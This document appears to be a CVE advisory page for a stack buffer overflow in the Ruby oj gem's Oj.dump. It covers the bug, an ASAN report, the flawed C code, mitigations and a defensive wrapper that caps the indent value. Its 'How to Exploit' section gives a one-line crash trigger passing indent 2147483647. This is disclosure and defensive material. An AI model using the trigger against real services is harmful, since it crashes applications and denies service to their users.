Oj is a widely-used Ruby gem designed for fast JSON parsing and object marshalling. CVE-2026-54502 describes a stack-based buffer overflow vulnerability in the `Oj.dump` method when an excessively large `:indent` value is provided.
The vulnerability resides in the `fill_indent` function within `ext/oj/dump.h`. This function is responsible for adding indentation whitespace when serializing Ruby objects to JSON. It calculates the number of spaces needed with the expression `(size_t)(out->opts->indent * depth)`, where `opts->indent` is the user-provided indentation value and `depth` is the nesting depth of the object being dumped.
The critical flaw is that the `indent` option is accepted as a plain Ruby integer and stored as an `int` without any range validation. When `opts->indent` is set to `INT_MAX` (2,147,483,647), the `(size_t)` cast preserves this large value. The subsequent `memset(out->buf + …, ' ', len)` call then attempts to write approximately 2 GB of space characters into the stack-allocated `out` buffer, which is only 4,184 bytes in size. This massive write corrupts the stack and crashes the process.
The issue is triggered when calling `Oj.dump` with `mode: :compat` and an extreme `indent` value. The AddressSanitizer (ASAN) report confirms a stack-buffer-overflow at the `memset` call in fill_indent, with the overflow occurring at offset 4728 from the `out` buffer’s base address. The call stack traces the overflow through dump_array, oj_dump_obj_to_json_using_params, and ultimately dump.
All versions of the oj gem containing `ext/oj/dump.h` are affected, with version 3.17.1 confirmed as vulnerable. The vulnerability was discovered and reported through fuzzing efforts, and the project has since been added to Google’s OSS-Fuzz infrastructure for continuous security testing.
DailyCVE Form
Platform: Ruby (oj gem)
Version: all versions with dump.h (3.17.1 confirmed)
Vulnerability: stack-based buffer overflow
Severity: High
Date: 2026-06-05
Prediction: 2026-06-19
What Undercode Say: Analytics
Check the installed oj gem version:

```shell
gem list oj
```

Verify the vulnerability by attempting a dump with an extreme indent (this crashes the Ruby process):

```shell
ruby -e "require 'oj'; Oj.dump([1], mode: :compat, indent: 2147483647)"
```
ASAN Report (from CVE advisory):
```text
==69820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fd1fc201278
WRITE of size 2147483647 at 0x7fd1fc201278 thread T0
    #0 memset
    #1 fill_indent /ext/oj/dump.h:77
    #2 dump_array /ext/oj/dump_compat.c:165
    #3 oj_dump_obj_to_json_using_params /ext/oj/dump.c:818
    #4 dump_body /ext/oj/oj.c:1429
    #5 dump /ext/oj/oj.c:1480

Address is in stack of thread T0 at offset 4728 in frame:
    #0 dump /ext/oj/oj.c:1453
  [544, 4728) 'out' <== Memory access at offset 4728 overflows this variable
```
Vulnerable Code (ext/oj/dump.h, line 77):
```c
static void fill_indent(Out out, int depth) {
    if (0 < out->opts->indent) {
        /* indent is a user-controlled int; no upper bound is enforced */
        size_t len = (size_t)(out->opts->indent * depth);
        // ...
        memset(out->buf + ..., ' ', len); // len = 2147483647 * depth
    }
}
```
How to Exploit
To exploit this vulnerability, an attacker must be able to control the `:indent` parameter passed to Oj.dump. The exploit is trivial to reproduce:
```ruby
require "oj"

obj = [1]  # any non-empty array will do
Oj.dump(obj, mode: :compat, indent: 2_147_483_647)
```
When executed, the `memset` call attempts to write 2 GB of data into a 4,184-byte stack buffer. This causes immediate stack corruption and process crash (segmentation fault). While the current impact is denial of service, the nature of stack-based buffer overflows means that under specific conditions, an attacker could potentially overwrite return addresses or other critical stack data to achieve arbitrary code execution.
The vulnerability is particularly concerning in applications that accept user-controlled indentation settings for JSON serialization, as any user who can influence the `indent` parameter can trigger the crash.
Protection
For Developers:
- Do not use extreme indent values when calling `Oj.dump`. The `indent` parameter should be limited to reasonable values (e.g., 0-8 spaces).
- Do not expose the `indent` option to end users without validating and capping the input. Applications should never allow untrusted users to control the indentation size.
- Validate and sanitize any user-provided integer that will be passed as the `indent` parameter.
- Upgrade to a patched version once the oj gem maintainers release a fix addressing this vulnerability.
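The developer-side guard described above, as an added example (not code from the advisory or from the oj project): a wrapper that validates and caps `:indent` before it reaches `Oj.dump`. The cap of 8 and the names `validate_indent`, `safe_dump` and `IndentError` are assumptions for this illustration.

```ruby
# Added example: a guard that caps the :indent option before it reaches
# Oj.dump, so the C extension never sees a value large enough to overflow
# the stack-allocated `out` buffer.

MAX_INDENT = 8   # assumption: the page suggests keeping indent within 0-8 spaces

class IndentError < ArgumentError; end

# Validates a user-supplied indent. Returns the Integer or raises IndentError.
def validate_indent(value, max: MAX_INDENT)
  # Only genuine Integers are accepted: the option ends up in a C int, so
  # strings, floats and huge values must be rejected, not coerced with to_i.
  raise IndentError, "indent must be an Integer" unless value.is_a?(Integer)
  raise IndentError, "indent must not be negative" if value.negative?
  raise IndentError, "indent #{value} exceeds cap of #{max}" if value > max
  value
end

# Wrapper around Oj.dump. An optional block lets callers (and tests) supply
# another serializer; by default the gem is loaded and Oj.dump is called.
def safe_dump(obj, opts = {}, max_indent: MAX_INDENT)
  indent = validate_indent(opts.fetch(:indent, 0), max: max_indent)
  opts = opts.merge(indent: indent)
  if block_given?
    yield(obj, opts)
  else
    require "oj"
    Oj.dump(obj, opts)
  end
end

# Worked check against the advisory's trigger value: the INT_MAX indent is
# refused before any serializer runs, while a sane indent passes through.
def demo
  refused = begin
    safe_dump([1, 2], { mode: :compat, indent: 2_147_483_647 }) { |o, _| o.to_s }
    false
  rescue IndentError
    true
  end
  passed = safe_dump([1, 2], { mode: :compat, indent: 2 }) { |_o, o_opts| o_opts[:indent] }
  [refused, passed]
end
```

Calling `demo` returns `[true, 2]`: the overflow-sized indent never reaches the extension, and a reasonable indent is forwarded unchanged.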
For Maintainers (oj gem):
- Implement range validation on the `indent` option before storing it as an `int`.
- Cap the maximum allowed `indent` value to a safe limit (e.g., 255).
- Add fuzz testing for all dump-related code paths to catch similar issues early.
Impact
Denial of Service: The primary and immediate impact is application crash due to stack corruption. Any Ruby application using `Oj.dump` with a large `:indent` value will terminate unexpectedly.
Potential Arbitrary Code Execution: Stack-based buffer overflows can, in some cases, be leveraged to overwrite return addresses or function pointers on the stack, potentially allowing an attacker to execute arbitrary code. While this specific vulnerability has not been demonstrated to be exploitable for code execution, the underlying mechanism creates that risk.
Affected Systems: All applications using the oj gem with versions that include the vulnerable `ext/oj/dump.h` file are affected. The latest tested vulnerable version is 3.17.1.
CVSS Severity: High
Sources:
Reported By: github.com